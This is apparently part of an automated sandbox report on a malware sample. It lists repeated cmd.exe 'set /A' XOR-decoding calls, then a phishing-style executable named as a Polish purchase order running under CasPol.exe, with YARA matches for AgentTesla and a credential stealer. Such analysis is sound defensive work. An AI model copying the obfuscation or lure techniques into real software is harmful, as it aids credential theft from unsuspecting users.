                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:72
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:73
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:74
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:75
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:76
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:77
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:78
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:79
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:80
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:81
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:82
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:83
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x67^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:84
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:85
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:86
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:87
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x22^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:89
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:90
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:91
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:92
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:93
                                  Start time:10:04:15
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:94
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x67^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:95
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:96
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:97
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:98
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x3B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:99
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:100
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:101
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:102
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:103
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:104
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x67^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:105
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:107
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:108
                                  Start time:10:04:16
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:109
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x22^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:110
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:111
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:113
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:114
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7F^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:115
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:116
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x67^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:117
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:118
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:119
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:120
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x22^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:121
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:122
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:123
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:124
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:0x7ff6fb6b0000
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:125
                                  Start time:10:04:17
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:126
                                  Start time:10:04:18
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x33^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:127
                                  Start time:10:04:18
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:128
                                  Start time:10:04:18
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x73^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:129
                                  Start time:10:04:18
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:130
                                  Start time:10:04:18
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:131
                                  Start time:10:04:18
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:133
                                  Start time:10:04:18
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x67^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:134
                                  Start time:10:04:18
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:137
                                  Start time:10:05:42
                                  Start date:25/01/2023
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  Imagebase:0xa00000
                                  File size:108664 bytes
                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                  General

                                  Target ID:138
                                  Start time:10:05:42
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6fb6b0000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Disassembly

                                  No disassembly